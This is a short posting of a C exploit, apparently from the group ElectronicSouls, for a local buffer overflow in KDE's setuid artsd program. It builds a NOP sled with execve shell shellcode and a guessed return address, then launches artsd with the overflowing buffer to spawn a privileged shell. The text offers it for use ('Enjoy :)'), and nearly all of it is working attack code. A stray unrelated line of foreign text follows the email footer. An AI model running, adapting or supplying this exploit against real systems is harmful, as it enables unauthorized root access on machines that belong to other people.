This is the local buffer oveflow exploit for KDE's artsd application. Enjoy :) ------------------------------------------------- /* 0x4553artsd.c [ElectronicSouls] KDE 2.x/3.x artsd Local Exploit By: BuRn-X & 0x90 0x90 "The louder the music the better the code!" Note: artsd must be +s to work "Save a bug, save a life!" http://www.electronicsouls.org */ #include #include #include #define BSIZE 4000 #define ALIGN 0 #define OFFSET 0 unsigned char esshellcode[] = "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { char *buffer; int i; int bsize = BSIZE; int align = ALIGN; int offset = OFFSET; unsigned long addr; if(argc > 1) bsize = atoi(argv[1]); buffer = (char *)malloc(bsize); bzero(buffer, bsize); memset(buffer, 0x90, bsize); addr = get_sp() - offset; *(unsigned long *)&buffer[bsize - 4] = addr; *(unsigned long *)&buffer[bsize - 8] = addr; memcpy(buffer + bsize - 8 - align - strlen (esshellcode), esshellcode, strlen(esshellcode)); execl ("/opt/kde/bin/artsd", "artsd", "-m", buffer, NULL); return 0; } ------------------------------------------------ Get your own Free ES E-mail account at : Http://electronicsouls.zzn.com

亚洲欧美在线